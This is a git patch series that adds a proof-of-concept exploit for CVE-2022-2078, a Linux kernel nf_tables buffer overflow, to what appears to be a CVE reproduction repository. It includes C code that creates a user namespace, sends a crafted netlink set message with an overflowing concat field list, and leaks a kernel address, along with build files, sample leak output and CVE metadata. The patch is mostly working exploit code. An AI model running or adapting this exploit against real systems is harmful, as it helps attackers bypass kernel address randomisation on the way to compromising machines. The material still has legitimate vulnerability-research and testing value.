From 4da7567ee1186a0a96406f3d956d16fad2335a18 Mon Sep 17 00:00:00 2001 From: Buaazhangyp <1633059098@qq.com> Date: Tue, 14 Mar 2023 13:38:35 +0800 Subject: [PATCH 1/2] add CVE-2022-2078 --- cve/linux-kernel/2022/CVE-2022-2078/Makefile | 16 + cve/linux-kernel/2022/CVE-2022-2078/README.md | 12 + cve/linux-kernel/2022/CVE-2022-2078/boot.sh | 7 + .../2022/CVE-2022-2078/dbg_boot.sh | 7 + cve/linux-kernel/2022/CVE-2022-2078/helper.c | 591 ++++++++++++++++++ cve/linux-kernel/2022/CVE-2022-2078/helper.h | 15 + cve/linux-kernel/2022/CVE-2022-2078/poc.c | 86 +++ cve/linux-kernel/2022/yaml/CVE-2022-2078.yaml | 20 + openkylin_list.yaml | 1 + 9 files changed, 755 insertions(+) create mode 100644 cve/linux-kernel/2022/CVE-2022-2078/Makefile create mode 100644 cve/linux-kernel/2022/CVE-2022-2078/README.md create mode 100644 cve/linux-kernel/2022/CVE-2022-2078/boot.sh create mode 100644 cve/linux-kernel/2022/CVE-2022-2078/dbg_boot.sh create mode 100644 cve/linux-kernel/2022/CVE-2022-2078/helper.c create mode 100644 cve/linux-kernel/2022/CVE-2022-2078/helper.h create mode 100644 cve/linux-kernel/2022/CVE-2022-2078/poc.c create mode 100644 cve/linux-kernel/2022/yaml/CVE-2022-2078.yaml diff --git a/cve/linux-kernel/2022/CVE-2022-2078/Makefile b/cve/linux-kernel/2022/CVE-2022-2078/Makefile new file mode 100644 index 00000000..d6050945 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-2078/Makefile @@ -0,0 +1,16 @@ +all: poc.o helper.o + $(CC) -no-pie poc.o helper.o \ + --include /usr/src/linux-hwe-5.15-headers-5.15.0-53/include/uapi/linux/netfilter/nf_tables.h \ + -lmnl -lnftnl \ + -lpthread \ + -o poc + +poc.o: poc.c + $(CC) -c -o "$@" "$<" + +helper.o: helper.c + $(CC) -c \ + -o "$@" "$<" + +clean: + rm -rf poc.o helper.o poc \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-2078/README.md b/cve/linux-kernel/2022/CVE-2022-2078/README.md new file mode 100644 index 00000000..6ff3c844 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-2078/README.md @@ -0,0 +1,12 @@ +# CVE-2022-2078 + +``` +$ ./poc +... +[+] get_set +leak_buffer: + 0000 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 0123456789:;<=>? + 0010 28 00 00 00 00 02 0a 8f 68 8b a2 be 40 ac 70 8c (.......h...@.p. + 0020 ff ff ff ff 00 6c b5 81 .....l.. +[+] kernel=0xffffffff8c70ac40 +``` \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-2078/boot.sh b/cve/linux-kernel/2022/CVE-2022-2078/boot.sh new file mode 100644 index 00000000..b788cd11 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-2078/boot.sh @@ -0,0 +1,7 @@ +#!/bin/bash + +export ORIG_PWD="$PWD" + +cd ../linux-kernel-study +./boot.sh +cd $ORIG_PWD \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-2078/dbg_boot.sh b/cve/linux-kernel/2022/CVE-2022-2078/dbg_boot.sh new file mode 100644 index 00000000..930a24da --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-2078/dbg_boot.sh @@ -0,0 +1,7 @@ +#!/bin/bash + +export ORIG_PWD="$PWD" + +cd ../linux-kernel-study +./dbg_boot.sh +cd $ORIG_PWD \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-2078/helper.c b/cve/linux-kernel/2022/CVE-2022-2078/helper.c new file mode 100644 index 00000000..9312b977 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-2078/helper.c @@ -0,0 +1,591 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include + +#include +#include +#include +#include +#include +#include + +uint8_t leak_buffer[0x100]; + +void my_nftnl_set_nlmsg_build_payload(struct nlmsghdr *nlh, char * table_name, char * set_name) +{ + struct nlattr *nest1; + struct nlattr *nest2; + struct nlattr *nest_elem; + int i; + int num_exprs = 0; + + mnl_attr_put_strz(nlh, NFTA_SET_TABLE, table_name); + mnl_attr_put_strz(nlh, NFTA_SET_NAME, set_name); + mnl_attr_put_u32(nlh, NFTA_SET_KEY_TYPE, htonl(13)); + mnl_attr_put_u32(nlh, NFTA_SET_KEY_LEN, htonl(sizeof(uint16_t))); + mnl_attr_put_u32(nlh, NFTA_SET_ID, htonl(1)); + + nest1 = mnl_attr_nest_start(nlh, NFTA_SET_DESC); + + mnl_attr_put_u32(nlh, NFTA_SET_DESC_SIZE, htonl(20)); + + nest2 = mnl_attr_nest_start(nlh, 2); // NFTA_SET_DESC_CONCAT + for (i = 0; i < 16; i++) { + nest_elem = mnl_attr_nest_start(nlh, NFTA_LIST_ELEM); + mnl_attr_put_u32(nlh, 1, htonl(0x30+i)); // NFTA_SET_FIELD_LEN + mnl_attr_nest_end(nlh, nest_elem); + } + + // overwrite field_count + nest_elem = mnl_attr_nest_start(nlh, NFTA_LIST_ELEM); + mnl_attr_put_u32(nlh, 1, htonl(40)); // NFTA_SET_FIELD_LEN + mnl_attr_nest_end(nlh, nest_elem); + + + mnl_attr_nest_end(nlh, nest2); + + mnl_attr_nest_end(nlh, nest1); +} + +void hexDump(char *desc, void *addr, int len) +{ + int i; + unsigned char buff[17]; + unsigned char *pc = (unsigned char*)addr; + + // Output description if given. + if (desc != NULL) + printf ("%s:\n", desc); + + // Process every byte in the data. + for (i = 0; i < len; i++) { + // Multiple of 16 means new line (with line offset). + + if ((i % 16) == 0) { + // Just don't print ASCII for the zeroth line. + if (i != 0) + printf(" %s\n", buff); + + // Output the offset. + printf(" %04x ", i); + } + + // Now the hex code for the specific character. + printf(" %02x", pc[i]); + + // And store a printable ASCII character for later. + if ((pc[i] < 0x20) || (pc[i] > 0x7e)) { + buff[i % 16] = '.'; + } else { + buff[i % 16] = pc[i]; + } + + buff[(i % 16) + 1] = '\0'; + } + + // Pad out last line if not exactly 16 characters. + while ((i % 16) != 0) { + printf(" "); + i++; + } + + // And print the final ASCII bit. + printf(" %s\n", buff); +} + +void print_nla(struct nlattr * attr) { + printf("nla_len : 0x%04x\n", attr->nla_len); + printf("nla_type: 0x%04x\n", attr->nla_type); + hexDump("data", (void *)attr, attr->nla_len); +} + +void print_nlh(struct nlmsghdr * nlh) +{ + struct nlattr *attr; + unsigned int offset; + + printf("nlmsg_len : 0x%08x\n", nlh->nlmsg_len); + printf("nlmsg_type : 0x%04x\n", nlh->nlmsg_type); + printf("nlmsg_flags: 0x%04x\n", nlh->nlmsg_flags); + printf("nlmsg_seq : 0x%08x\n", nlh->nlmsg_seq); + printf("nlmsg_pid : 0x%08x\n", nlh->nlmsg_pid); + printf("------------------------------------\n"); + + attr = ((void *)nlh + sizeof(struct nlmsghdr)); + + while(1) + { + print_nla(attr); + printf("------------------------------------\n"); + + // nested nlh + if (attr->nla_type == NFTA_SET_DESC) { + printf("-------- PRINTING NFTA DESC --------\n"); + struct nlattr * ptr; + + // NFTA_SET_DESC_SIZE + ptr = (void *)attr+4; + print_nla(ptr); + printf("------------------------------------\n"); + ptr = mnl_attr_next(ptr); + + // PRINT NFTA_LIST_ELEM + uint16_t desc_len = ptr->nla_len-4; + ptr = (void *)ptr+4; + for (int i=0; i < desc_len; i+=ptr->nla_len) { + printf("ELEM[%d]\n", i/0xc); + print_nla((void *)ptr+i); + leak_buffer[i/0xc] = *(uint8_t *)((void *)ptr+i+11); + printf("------------------------------------\n"); + } + } + attr = mnl_attr_next(attr); + + if ((uint64_t)attr >= (uint64_t)((void *)nlh + nlh->nlmsg_len)) + break; + } + //hexDump("leak_buffer", leak_buffer, 40); + return; +} +void poison_tb(struct nlmsghdr * nlh) +{ + printf("[*] try modifying field_len\n"); + + const struct nlattr *attr; + unsigned int offset; + + attr = ((void *)nlh + sizeof(struct nlmsghdr)); + + while(1) + { + printf("nla_len : 0x%04x\n", attr->nla_len); + printf("nla_type: 0x%04x\n", attr->nla_type); + if (attr->nla_len != 0x00d0 || attr->nla_type != 0x8009) + { + attr = mnl_attr_next(attr); + continue; + } + + *(uint16_t *)((void *)attr+0xc) = 0xc4+0xc; + // *(uint32_t *)((void *)attr+0x1c-4) = 0xfcffffff; + hexDump("malicious attr", (void *)attr, attr->nla_len); + printf("------------------------------------\n"); + + attr = mnl_attr_next(attr); + + if ((uint64_t)attr >= (uint64_t)((void *)nlh + nlh->nlmsg_len)) + break; + } + + return; +} + + +void poison_field_len(struct nlmsghdr * nlh) +{ + printf("[*] try modifying field_len\n"); + + const struct nlattr *attr; + unsigned int offset; + + attr = ((void *)nlh + sizeof(struct nlmsghdr)); + + while(1) + { + printf("nla_len : 0x%04x\n", attr->nla_len); + printf("nla_type: 0x%04x\n", attr->nla_type); + if (attr->nla_len != 0x1c || attr->nla_type != 0x8009) + { + attr = mnl_attr_next(attr); + continue; + } + + *(uint32_t *)((void *)attr+0x1c-4) = 0xfcffffff; + hexDump("malicious attr", (void *)attr, attr->nla_len); + printf("------------------------------------\n"); + + attr = mnl_attr_next(attr); + + if ((uint64_t)attr >= (uint64_t)((void *)nlh + nlh->nlmsg_len)) + break; + } + + return; +} + +static int parse_attr_cb(const struct nlattr *attr, void *data) +{ + int type = mnl_attr_get_type(attr); + printf("type: 0x%x\n", type); +} + +void send_batch(struct mnl_nlmsg_batch *batch, mnl_cb_t cb_data) +{ + struct mnl_socket *nl; + char buf[MNL_SOCKET_BUFFER_SIZE]; + uint32_t portid; + int ret, batching; + + nl = mnl_socket_open(NETLINK_NETFILTER); + if (nl == NULL) { + perror("mnl_socket_open"); + exit(EXIT_FAILURE); + } + + if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) { + perror("mnl_socket_bind"); + exit(EXIT_FAILURE); + } + portid = mnl_socket_get_portid(nl); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)) < 0) { + perror("mnl_socket_send"); + exit(EXIT_FAILURE); + } + + mnl_nlmsg_batch_stop(batch); + + ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); + while (ret > 0) { + ret = mnl_cb_run(buf, ret, 0, portid, cb_data, NULL); + if (ret <= 0) + break; + ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); + } + if (ret == -1) { + perror("error"); + exit(EXIT_FAILURE); + } + mnl_socket_close(nl); +} + +static struct nftnl_table *setup_table(uint32_t family, char * table_name) +{ + struct nftnl_table *t; + + t = nftnl_table_alloc(); + if (t == NULL) { + perror("[!] Couldn't allocate a table"); + exit(EXIT_FAILURE); + } + + nftnl_table_set_u32(t, NFTNL_TABLE_FAMILY, family); + nftnl_table_set_str(t, NFTNL_TABLE_NAME, table_name); + + return t; +} + +static struct nftnl_set *setup_set(uint32_t family, const char *table_name, const char *set_name) +{ + struct nftnl_set *s = NULL; + + s = nftnl_set_alloc(); + if (s == NULL) { + perror("OOM"); + exit(EXIT_FAILURE); + } + + nftnl_set_set_str(s, NFTNL_SET_TABLE, table_name); + nftnl_set_set_str(s, NFTNL_SET_NAME, set_name); + nftnl_set_set_u32(s, NFTNL_SET_FAMILY, family); + nftnl_set_set_u32(s, NFTNL_SET_KEY_LEN, sizeof(uint16_t)); + /* inet service type, see nftables/include/datatypes.h */ + nftnl_set_set_u32(s, NFTNL_SET_KEY_TYPE, 13); + nftnl_set_set_u32(s, NFTNL_SET_ID, 1); + // NFTA_SET_DESC + // NFTA_SET_DESC_SIZE + // NFTA_SET_DESC_CONCAT + // NFTA_SET_FIELD_LEN + // set NFTNL_SET_DESC_SIZE & NFTNL_SET_DESC_CONCAT == set NFTA_SET_DESC + nftnl_set_set_u32(s, NFTNL_SET_DESC_SIZE, 20); + + nftnl_set_set_str(s, NFTNL_SET_DESC_CONCAT, "0000111122223333"); + + /* + for (int i=0; i<32; i++) { + nftnl_set_set_u32(s, NFTNL_SET_DESC_CONCAT, i+0x30); + } + */ + + return s; +} + +void add_table(uint32_t family, char *table_name){ + struct mnl_socket *nl; + char buf[MNL_SOCKET_BUFFER_SIZE]; + struct nlmsghdr *nlh; + uint32_t portid, seq, table_seq; + struct nftnl_table *t; + struct mnl_nlmsg_batch *batch; + int ret; + + t = setup_table(family, table_name); + if (t == NULL) + exit(EXIT_FAILURE); + + seq = time(NULL); + batch = mnl_nlmsg_batch_start(buf, sizeof(buf)); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + table_seq = seq; + nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWTABLE, family, + NLM_F_CREATE | NLM_F_ACK, seq++); + nftnl_table_nlmsg_build_payload(nlh, t); + nftnl_table_free(t); + mnl_nlmsg_batch_next(batch); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + send_batch(batch, NULL); + + printf("[*] table added: %s\n", table_name); + return; +} + +void add_set(uint32_t family, char * table_name, char * set_name){ + struct mnl_socket *nl; + char buf[MNL_SOCKET_BUFFER_SIZE]; + struct nlmsghdr *nlh; + uint32_t portid, seq, set_seq; + struct nftnl_set * s; + struct mnl_nlmsg_batch *batch; + int ret; + + s = setup_set(family, table_name, set_name); + if (s == NULL) + exit(EXIT_FAILURE); + + seq = time(NULL); + batch = mnl_nlmsg_batch_start(buf, sizeof(buf)); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + set_seq = seq; + nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWSET, family, + NLM_F_CREATE | NLM_F_ACK, seq++); + nftnl_set_nlmsg_build_payload(nlh, s); + // print_nlh(nlh); + nftnl_set_free(s); + mnl_nlmsg_batch_next(batch); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + send_batch(batch, NULL); + + printf("[*] set added: %s\n", set_name); + return; +} +void add_mal_set(uint32_t family, char * table_name, char * set_name){ + struct mnl_socket *nl; + char buf[MNL_SOCKET_BUFFER_SIZE]; + struct nlmsghdr *nlh; + uint32_t portid, seq, set_seq; + struct nftnl_set * s; + struct mnl_nlmsg_batch *batch; + int ret; + + s = setup_set(family, table_name, set_name); + if (s == NULL) + exit(EXIT_FAILURE); + + seq = time(NULL); + batch = mnl_nlmsg_batch_start(buf, sizeof(buf)); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + set_seq = seq; + nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWSET, family, + NLM_F_CREATE | NLM_F_ACK, seq++); + //nftnl_set_nlmsg_build_payload(nlh, s); + my_nftnl_set_nlmsg_build_payload(nlh, table_name, set_name); + //print_nlh(nlh); + // poison_tb(nlh); + // poison_field_len(nlh); + nftnl_set_free(s); + mnl_nlmsg_batch_next(batch); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + send_batch(batch, NULL); + + printf("[*] malicious set added: %s\n", set_name); + return; +} + +static int set_cb(const struct nlmsghdr *nlh, void *data) +{ + struct nftnl_set *t; + char buf[4096]; + uint32_t *type = data; + + printf("[+] getset callback\n"); + printf("nlh : %p\n", nlh); + printf("data: %p\n", data); + + t = nftnl_set_alloc(); + if (t == NULL) { + perror("OOM"); + goto err; + } + + if (nftnl_set_nlmsg_parse(nlh, t) < 0) { + perror("nftnl_set_nlmsg_parse"); + goto err_free; + } + print_nlh((struct nlmsghdr *)nlh); + + //nftnl_set_snprintf(buf, sizeof(buf), t, *type, 0); + //printf("%s\n", buf); + +err_free: + // nftnl_set_free(t); +err: + return MNL_CB_OK; +} + +void get_set(uint32_t family){ + struct mnl_socket *nl; + char buf[MNL_SOCKET_BUFFER_SIZE]; + struct nlmsghdr *nlh; + uint32_t portid, seq, set_seq; + struct nftnl_set * s; + struct mnl_nlmsg_batch *batch; + int ret; + + s = nftnl_set_alloc(); + if (s == NULL) + exit(EXIT_FAILURE); + + seq = time(NULL); + batch = mnl_nlmsg_batch_start(buf, sizeof(buf)); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + set_seq = seq; + nlh = nftnl_nlmsg_build_hdr(buf, NFT_MSG_GETSET, family, + NLM_F_DUMP | NLM_F_ACK, seq); + nftnl_set_nlmsg_build_payload(nlh, s); + nftnl_set_free(s); + + send_batch(batch, set_cb); + + printf("[+] get_set\n"); + + return; +} + + + + +/* +static int example_set_cb(const struct nlmsghdr *nlh, void *data) +{ + struct nftnl_set *t; + char buf[4096]; + uint32_t *type = data; + + printf("[+] getset callback\n"); + printf("nlh : %p\n", nlh); + printf("data: %p\n", data); + + t = nftnl_set_alloc(); + if (t == NULL) { + perror("OOM"); + goto err; + } + + if (nftnl_set_nlmsg_parse(nlh, t) < 0) { + perror("nftnl_set_nlmsg_parse"); + goto err_free; + } + + print_nlh(nlh); + printf("end of print_nlh\n"); +err_free: + //nftnl_set_free(t); + printf("free\n"); +err: + return MNL_CB_OK; +} + +int example_getset(uint32_t family) +{ + struct mnl_socket *nl; + char buf[MNL_SOCKET_BUFFER_SIZE]; + struct nlmsghdr *nlh; + uint32_t portid, seq; + uint32_t type = NFTNL_OUTPUT_DEFAULT; + struct nftnl_set *t = NULL; + int ret; + + t = nftnl_set_alloc(); + if (t == NULL) { + perror("OOM"); + exit(EXIT_FAILURE); + } + seq = time(NULL); + + nlh = nftnl_nlmsg_build_hdr(buf, NFT_MSG_GETSET, family, + NLM_F_DUMP | NLM_F_ACK, seq); + nftnl_set_nlmsg_build_payload(nlh, t); + nftnl_set_free(t); + + nl = mnl_socket_open(NETLINK_NETFILTER); + if (nl == NULL) { + perror("mnl_socket_open"); + exit(EXIT_FAILURE); + } + + if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) { + perror("mnl_socket_bind"); + exit(EXIT_FAILURE); + } + portid = mnl_socket_get_portid(nl); + + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { + perror("mnl_socket_send"); + exit(EXIT_FAILURE); + } + + ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); + printf("ret: %d\n", ret); + while (ret > 0) { + ret = mnl_cb_run(buf, ret, seq, portid, example_set_cb, &type); + if (ret <= 0) + break; + ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); + printf("ret: %d\n", ret); + } + if (ret == -1) { + perror("error"); + exit(EXIT_FAILURE); + } + mnl_socket_close(nl); + + return EXIT_SUCCESS; +} +*/ \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-2078/helper.h b/cve/linux-kernel/2022/CVE-2022-2078/helper.h new file mode 100644 index 00000000..8708a110 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-2078/helper.h @@ -0,0 +1,15 @@ +#include + +#include + +uint8_t leak_buffer[0x100]; + +void hexDump(char *desc, void *addr, int len); +void send_batch(struct mnl_nlmsg_batch *batch); +static struct nftnl_table *setup_table(uint32_t family, char * table_name); +static struct nftnl_set *setup_set(uint32_t family, const char *table_name, const char *set_name); + +void add_table(uint32_t family, char *table_name); +void add_set(uint32_t family, char * table_name, char * set_name); +void add_mal_set(uint32_t family, char * table_name, char * set_name); +void get_set(uint32_t family); \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-2078/poc.c b/cve/linux-kernel/2022/CVE-2022-2078/poc.c new file mode 100644 index 00000000..fc05518f --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-2078/poc.c @@ -0,0 +1,86 @@ +#define _GNU_SOURCE +#include +#include +#include +#include + +#include + +#include "helper.h" + +void write_to_file(const char *which, const char *format, ...) { + FILE * fu = fopen(which, "w"); + va_list args; + va_start(args, format); + if (vfprintf(fu, format, args) < 0) { + perror("cannot write"); + exit(1); + } + fclose(fu); +} + +static int setup_sandbox(void) +{ + uid_t uid = getuid(); + gid_t gid = getgid(); + + if (unshare(CLONE_NEWUSER) < 0) + { + perror("[-] unshare(CLONE_NEWUSER)"); + return -1; + } + + if (unshare(CLONE_NEWNET) < 0) + { + perror("[-] unshare(CLONE_NEWNET)"); + return -1; + } + + printf("[+] unshare done\n"); + + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(0, &set); + if (sched_setaffinity(getpid(), sizeof(set), &set) < 0) + { + perror("[-] sched_setaffinity"); + return -1; + } + + // now we map uid and gid + write_to_file("/proc/self/uid_map", "0 %d 1", uid); + // deny setgroups (see user_namespaces(7)) + write_to_file("/proc/self/setgroups", "deny"); + // remap gid + write_to_file("/proc/self/gid_map", "0 %d 1", gid); + + return 0; +} + +int main() +{ + uint64_t kernel_leak = 0; + uint32_t family; + char * table_name; + char * set_name; + + if (setup_sandbox()) + { + printf("[-] setup_sandbox() failed"); + return -1; + } + + family = NFPROTO_IPV4; + table_name = "test_table"; + set_name = "test_set"; + add_table(family, table_name); + add_mal_set(family, table_name, set_name); + + // leak + get_set(family); + hexDump("leak_buffer", leak_buffer, 40); + kernel_leak = *(uint64_t *)((void *)leak_buffer+0x1c); + printf("[+] kernel=0x%016lx\n", kernel_leak); + //example_getset(family); + return 0; +} \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2078.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2078.yaml new file mode 100644 index 00000000..efe94bd8 --- /dev/null +++ b/cve/linux-kernel/2022/yaml/CVE-2022-2078.yaml @@ -0,0 +1,20 @@ +id: CVE-2022-2078 +source: https://github.com/delsploit/CVE-2022-2078 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: medium + description: | + 在 Linux 内核的 nft_set_desc_concat_parse() 函数中发现了一个漏洞。此缺陷允许攻击者通过 nft_set_desc_concat_parse() 触发缓冲区溢出,造成拒绝服务并可能运行代码。 + scope-of-influence: + Linux kernel(5.10.120-1, 5.18.2-1) + reference: + - https://bugzilla.redhat.com/show_bug.cgi?id=2096178 + - https://www.openwall.com/lists/oss-security/2022/06/02/1 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H + cvss-score: 5.5 + cve-id: CVE-2022-2078 + cwe-id: CWE-120 + cnvd-id: None + kve-id: None + tags: 缓冲区溢出,拒绝服务 \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 127b8584..3bf855fd 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -39,6 +39,7 @@ cve: - CVE-2021-41073 - CVE-2022-0435 - CVE-2021-26708 + - CVE-2022-2078 sudo: - CVE-2021-3156 - CVE-2023-22809 -- Gitee From 9b211f36cf3c99f310c87d7fe4125f8d7fc3afe3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BC=A0=E8=8B=B1=E9=B9=8F?= Date: Tue, 14 Mar 2023 07:32:03 +0000 Subject: [PATCH 2/2] update cve/linux-kernel/2022/yaml/CVE-2022-2078.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 张英鹏 --- cve/linux-kernel/2022/yaml/CVE-2022-2078.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2078.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2078.yaml index efe94bd8..fd30d43a 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-2078.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-2078.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H cvss-score: 5.5 cve-id: CVE-2022-2078 - cwe-id: CWE-120 + cwe-id: CWE-120, CWE-121 cnvd-id: None kve-id: None - tags: 缓冲区溢出,拒绝服务 \ No newline at end of file + tags: 缓冲区溢出, 拒绝服务 \ No newline at end of file -- Gitee